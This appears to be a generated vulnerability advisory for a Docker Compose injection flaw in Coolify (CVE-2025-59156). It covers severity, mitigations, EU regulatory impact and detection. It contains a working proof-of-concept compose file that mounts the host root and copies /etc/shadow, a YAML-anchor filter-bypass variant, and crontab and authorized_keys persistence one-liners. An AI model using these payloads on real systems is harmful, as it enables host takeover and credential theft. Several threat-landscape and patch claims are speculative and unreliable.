Description
Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.420.7, a Remote Code Execution (RCE)*vulnerability exists in Coolify's application deployment workflow. This flaw allows a low-privileged member to inject arbitrary Docker Compose directives during project creation or updates. By defining a malicious service that mounts the host filesystem, an attacker can achieve root-level command execution on the host OS, completely bypassing container isolation. Version 4.0.0-beta.420.7 contains a patch for the issue.
EPSS Score:
0%
Comprehensive Technical Analysis of EUVD-2025-206241 (CVE-2025-59156)
Vulnerability: Remote Code Execution (RCE) in Coolify via Malicious Docker Compose Injection
1. Vulnerability Assessment & Severity Evaluation
Vulnerability Overview
EUVD-2025-206241 (CVE-2025-59156) describes a critical Remote Code Execution (RCE) vulnerability in Coolify, an open-source, self-hostable infrastructure management tool. The flaw stems from insufficient input validation in Coolify’s application deployment workflow, allowing a low-privileged user to inject arbitrary Docker Compose directives during project creation or updates.
By crafting a malicious service definition that mounts the host filesystem, an attacker can bypass container isolation and execute commands with root-level privileges on the underlying host OS.
Severity Analysis (CVSS v4.0)
The vulnerability has been assigned a Base Score of 9.4 (Critical) with the following vector:
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
| Metric | Value | Explanation |
|---|---|---|
| Attack Vector (AV) | Network (N) | Exploitable remotely over the network. |
| Attack Complexity (AC) | Low (L) | No specialized conditions required. |
| Attack Requirements (AT) | None (N) | No prior access or conditions needed beyond low-privilege credentials. |
| Privileges Required (PR) | Low (L) | Only a low-privileged Coolify user account is needed. |
| User Interaction (UI) | None (N) | No user interaction required. |
| Vulnerable System Confidentiality (VC) | High (H) | Full compromise of host confidentiality. |
| Vulnerable System Integrity (VI) | High (H) | Full compromise of host integrity. |
| Vulnerable System Availability (VA) | High (H) | Full compromise of host availability. |
| Subsequent System Confidentiality (SC) | High (H) | Lateral movement possible to other systems. |
| Subsequent System Integrity (SI) | High (H) | Persistent backdoors or data manipulation. |
| Subsequent System Availability (SA) | High (H) | Denial-of-service or destruction of systems. |
Key Takeaways:
- Exploitability: High (low-privilege access, no user interaction, network-reachable).
- Impact: Catastrophic (full host compromise, container escape, root-level RCE).
- Likelihood of Exploitation: High (publicly disclosed, low complexity).
2. Potential Attack Vectors & Exploitation Methods
Exploitation Workflow
-
Initial Access:
- Attacker gains access to a low-privileged Coolify account (e.g., via phishing, credential stuffing, or insider threat).
- Alternatively, if Coolify is exposed to the internet without proper authentication, an unauthenticated attacker could exploit this (though the CVSS assumes
PR:L).
-
Malicious Docker Compose Injection:
- During project creation or update, Coolify allows users to define Docker Compose services.
- The vulnerability permits arbitrary YAML injection, enabling the attacker to define a malicious service with:
- Host filesystem mounts (e.g.,
/:/host). - Privileged mode (
privileged: true). - Custom entrypoints (e.g.,
/bin/sh -c "malicious_command").
- Host filesystem mounts (e.g.,
-
Container Escape & Host Compromise:
- When Coolify deploys the malicious service, Docker creates a container with host filesystem access.
- The attacker can then:
- Execute arbitrary commands on the host (e.g.,
chroot /host). - Escalate privileges to root (if not already root in the container).
- Persist on the host (e.g., via cron jobs, SSH keys, or malware).
- Move laterally to other systems in the network.
- Execute arbitrary commands on the host (e.g.,
Proof-of-Concept (PoC) Exploit
A minimal malicious docker-compose.yml snippet:
version: '3.8'
services:
malicious-service:
image: alpine
volumes:
- /:/host
command: ["sh", "-c", "chroot /host /bin/sh -c 'id > /tmp/pwned; cat /etc/shadow > /tmp/shadow'"]
privileged: true
Impact:
- Dumps
/etc/shadowto/tmp/shadowon the host. - Executes arbitrary commands (e.g., reverse shell, ransomware deployment).
Real-World Attack Scenarios
-
Cloud & DevOps Environments:
- Coolify is often used in self-hosted CI/CD pipelines and cloud infrastructure management.
- An attacker could compromise a build server, steal secrets, or deploy cryptominers.
-
Shared Hosting & Multi-Tenant Systems:
- If Coolify is used in a shared hosting environment, one tenant could escape their container and access other tenants' data.
-
Supply Chain Attacks:
- If Coolify is used to deploy third-party applications, an attacker could backdoor dependencies or inject malicious code into production systems.
3. Affected Systems & Software Versions
Vulnerable Versions
- Coolify versions prior to
4.0.0-beta.420.7are affected. - The vulnerability was introduced in an earlier beta release and persists until the patch.
Affected Components
- Coolify Core (application deployment workflow).
- Docker Compose Integration (YAML parsing and service deployment).
Not Affected
- Coolify
4.0.0-beta.420.7and later (patched). - Non-Docker deployments (if Coolify is used without Docker, the RCE vector does not apply).
4. Recommended Mitigation Strategies
Immediate Actions
-
Upgrade to Patched Version:
- Immediately upgrade to Coolify
4.0.0-beta.420.7or later. - Verify the patch by checking the GitHub Advisory.
- Immediately upgrade to Coolify
-
Isolate Coolify Instances:
- Restrict network access to Coolify’s web interface (e.g., via firewall rules, VPN, or IP whitelisting).
- Disable public internet exposure unless absolutely necessary.
-
Least Privilege Enforcement:
- Audit user permissions and ensure no unnecessary low-privileged accounts exist.
- Disable anonymous access if enabled.
-
Docker Hardening:
- Disable
privilegedmode in Docker unless explicitly required. - Use read-only filesystems where possible.
- Restrict volume mounts to only necessary directories.
- Enable Docker Content Trust (DCT) to prevent tampered images.
- Disable
Long-Term Mitigations
-
Input Validation & Sanitization:
- Implement strict YAML schema validation for Docker Compose files.
- Block dangerous directives (e.g.,
privileged,volumes: /,cap_add: ALL).
-
Runtime Protection:
- Deploy container runtime security tools (e.g., Falco, Aqua Security, Sysdig) to detect anomalous behavior.
- Use seccomp, AppArmor, or SELinux to restrict container capabilities.
-
Network Segmentation:
- Isolate Coolify in a dedicated VLAN with strict egress filtering.
- Use microsegmentation to limit lateral movement.
-
Monitoring & Logging:
- Enable Docker and Coolify audit logs.
- Set up alerts for suspicious activity (e.g., unexpected
chroot,mount, orprivilegedcontainer creation).
-
Incident Response Planning:
- Develop a containment plan for Coolify compromises.
- Regularly back up critical data to mitigate ransomware risks.
5. Impact on the European Cybersecurity Landscape
Regulatory & Compliance Implications
-
GDPR (General Data Protection Regulation):
- A successful RCE could lead to unauthorized access to personal data, triggering GDPR Article 33 (Data Breach Notification).
- Organizations may face fines up to €20 million or 4% of global revenue if negligence is proven.
-
NIS2 Directive (Network and Information Security):
- Coolify is used in critical infrastructure (e.g., cloud providers, DevOps pipelines).
- A breach could classify as a significant incident, requiring mandatory reporting to national CSIRTs.
-
DORA (Digital Operational Resilience Act):
- Financial institutions using Coolify must assess third-party risks and ensure resilience against supply chain attacks.
Threat Landscape in Europe
-
Targeted Attacks on DevOps & Cloud Environments:
- APT groups (e.g., APT29, Turla) and cybercriminals (e.g., LockBit, BlackCat) increasingly target CI/CD pipelines and self-hosted tools.
- Coolify’s RCE vulnerability is an attractive entry point for initial access brokers (IABs).
-
Supply Chain Risks:
- If Coolify is used to deploy open-source software, attackers could backdoor dependencies (e.g., Log4j-style attacks).
- European SMEs (which often rely on self-hosted tools) are particularly vulnerable.
-
Critical Infrastructure Exposure:
- Coolify is used in energy, healthcare, and finance sectors in Europe.
- A successful attack could disrupt services (e.g., ransomware on hospital systems, power grid management tools).
Recommendations for European Organizations
-
National CSIRTs & CERTs:
- Issue advisories to critical infrastructure operators.
- Monitor for exploitation attempts in the wild.
-
Enterprises & SMEs:
- Conduct vulnerability scans for Coolify instances.
- Implement Zero Trust for DevOps environments.
-
Open-Source Maintainers:
- Improve security practices (e.g., fuzzing, static analysis, bug bounties).
- Collaborate with ENISA for coordinated disclosure.
6. Technical Details for Security Professionals
Root Cause Analysis
The vulnerability arises from insufficient input validation in Coolify’s Docker Compose YAML parser. Specifically:
- Coolify blindly trusts user-provided YAML during project creation/update.
- No schema validation is performed to block dangerous directives (e.g.,
volumes: /,privileged: true). - Docker’s default behavior allows containers to mount host directories and escalate privileges if misconfigured.
Exploitation Requirements
| Requirement | Details |
|---|---|
| Access Level | Low-privileged Coolify user (or unauthenticated if misconfigured). |
| Network Access | Coolify’s web interface must be reachable (LAN or internet). |
| Docker Permissions | Coolify must have Docker socket access (/var/run/docker.sock). |
| User Interaction | None (fully automated exploit). |
Detection & Forensics
-
Log Analysis:
- Check Coolify audit logs for:
- Unusual
docker-compose.ymlsubmissions. - Commands containing
chroot,mount, orprivileged.
- Unusual
- Review Docker daemon logs (
/var/log/docker.log) for:- Unexpected container creations with
volumes: /. - Containers running as
rootor withprivileged: true.
- Unexpected container creations with
- Check Coolify audit logs for:
-
Runtime Detection:
- Falco Rules (example):
- rule: Detect Host Filesystem Mount desc: Container mounting host filesystem condition: container and evt.type=mount and (container.mount.dest="/host" or container.mount.dest="/") output: "Container %container.name (id=%container.id) mounted host filesystem (user=%user.name command=%proc.cmdline)" priority: CRITICAL - Sysdig Secure or Aqua Security can detect anomalous container behavior.
- Falco Rules (example):
-
Post-Exploitation Indicators:
- Suspicious files in
/tmpor/var/tmp(e.g.,/tmp/pwned,/tmp/shadow). - Unexpected processes (e.g., reverse shells, cryptominers).
- Modified cron jobs or SSH keys in
/root/.ssh/authorized_keys.
- Suspicious files in
Reverse Engineering the Patch
The patch in 4.0.0-beta.420.7 likely includes:
- YAML Schema Validation:
- Blocking dangerous directives (
volumes: /,privileged: true,cap_add: ALL).
- Blocking dangerous directives (
- Whitelist-Based Parsing:
- Only allowing pre-approved Docker Compose fields.
- User Input Sanitization:
- Stripping or escaping malicious YAML payloads.
Verification Steps:
- Diff the patched version (
git diff v4.0.0-beta.420.6..v4.0.0-beta.420.7). - Test with malicious YAML to confirm rejection.
Advanced Exploitation Techniques
- Bypassing Input Validation:
- If the patch is incomplete, attackers may use YAML obfuscation (e.g., anchors, aliases) to bypass filters.
- Example:
x-malicious: &malicious volumes: ["/:/host"] privileged: true services: exploit: <<: *malicious image: alpine
- Chaining with Other Vulnerabilities:
- If Coolify has SSRF or XXE, an attacker could fetch malicious YAML from an external server.
- Persistence Mechanisms:
- Cron jobs (
echo "* * * * * root /bin/bash -c 'malicious_command'" >> /host/etc/crontab). - SSH backdoors (
echo "ssh-rsa AAAAB3NzaC1yc2E..." >> /host/root/.ssh/authorized_keys).
- Cron jobs (
Conclusion & Key Takeaways
- EUVD-2025-206241 (CVE-2025-59156) is a critical RCE vulnerability in Coolify with severe real-world impact.
- Exploitation is trivial for attackers with low-privilege access, leading to full host compromise.
- European organizations must patch immediately, harden Docker deployments, and monitor for exploitation.
- Long-term fixes require input validation, least privilege, and runtime protection.
Recommended Next Steps:
- Patch all Coolify instances to
4.0.0-beta.420.7or later. - Audit Docker configurations for dangerous settings.
- Deploy runtime security tools (Falco, Aqua, Sysdig).
- Review logs for signs of exploitation.
- Report suspicious activity to national CERTs (e.g., CERT-EU, BSI, ANSSI).
For further details, refer to the GitHub Advisory.
References
Affected Products
coolify
Version: < 4.0.0-beta.420.7
Vendors
coollabsio